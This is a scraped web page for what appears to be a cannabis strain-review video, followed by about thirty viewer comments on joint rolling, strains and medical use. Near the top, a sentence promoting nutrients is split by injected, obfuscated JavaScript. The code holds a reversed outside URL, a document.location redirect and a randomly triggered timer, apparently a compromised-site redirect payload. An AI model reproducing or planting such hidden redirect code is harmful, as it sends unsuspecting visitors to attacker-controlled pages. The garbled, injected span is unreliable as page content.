Marijuana Mondays – Death Bubba – Strain Review!!!

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Want toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to purchase my nutrients?

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33 thoughts on “Marijuana Mondays – Death Bubba – Strain Review!!!”

  1. Haydn Payne says:

    Why are they putting so much weed in 1 j?

  2. Grow Boss X says:

    Hy Remo what strain do you Grow now?
    please make a new Grow Video!
    i miss that so much when you show your nice plants!

    have a nice day Remo and friends

  3. Bo Stark says:

    King of the North

  4. Christopher Alexander says:

    i love you camera man 14:40 lol "stick with weed"

  5. VIRTUE says:

    HASH Wednesday

  6. Miguel Hernandez says:

    Remo brotha you need bigger papers!

  7. Demetri Morales says:

    you should review KK wiz khalifas

  8. Johnny Obrien says:

    love mj monday

  9. Sean Sheep says:

    LSD strain pickles my brain hahaha

  10. Andre Narcisse says:

    Yeah buddy you doin it Remo!!! Wish I could b there wit u man!!!

  11. Jeremy Sullivan aka Cannaseed says:

    Ginger and Maryanne are the only two still living

  12. David Robbins says:

    Where abouts do you live coz that place is so peaceful and beautiful

  13. odyssey says:

    0:14 my favorite day

  14. Adam SUC420 says:

    nice as always

  15. Kieran Elershot says:

    Wtf did the just put all that weed into 1 doubie??? I would be high from now til next month wtf

  16. cubs0110 says:

    I like to smoke vicariously through you in dry times

  17. AIS says:

    This joint did not run lol what a miracle lol

  18. Merlin420 says:

    how tf do you fit all that bud in that joint

  19. Bob Kowalski says:

    Since you dont sell a flushing product.. what do you recommend? so many in the market its hard to choose, though im leaning toward your old pals at AN (i know haha) with their flawless finish. suggestions??

  20. RNAtoDNA says:

    All these people complaining about how much weed goes into one joint make me laugh, it's like the people complaining about how much a space suit costs, yet will never wear it. Weed is just weed, it grows, it dies, it's here for a good time. Stop treating it like a dessert wine. And when did it become a crime to rime all the time?

  21. James Christman says:

    No, he don't need bigger papers, he needs more WEED!!

  22. BIG TOONER says:


  23. todaysrock420 says:

    looks very sedating. nice medicated goo.

  24. dsfad daf says:

    roll a 2 pape lol u dont need to jampack a 1

  25. ItsTheTrickAttack says:

    austrian death machine haha epic

  26. licmajunson says:

    when in doubt fire it up ;D lmaooooooooo

  27. Tree says:

    Wish I was hangin with you Remo! Cheers.

  28. Frank Krumnow says:

    We also need a weed wednesday and sativa saturday to fill up the week.

  29. Joseph Lewis says:

    where is Sandra?? remos hottie wife

  30. Connor Dearth says:

    that cannon looks like it was gonna burst!! first time watching and you guys rock!

  31. Lamont Wilson says:

    Can you roll cones? If not, you can buy a cone stuffer. You'll be able to fit more in a j

  32. michael monroe says:

    hey what strains would you recommend for chronic pain I'm trying to get off of pain medication that shits bad for your liver and organs I got fucked up in Iraq and I'm looking into taking medical marijuana because narcotics ain't the way to go man

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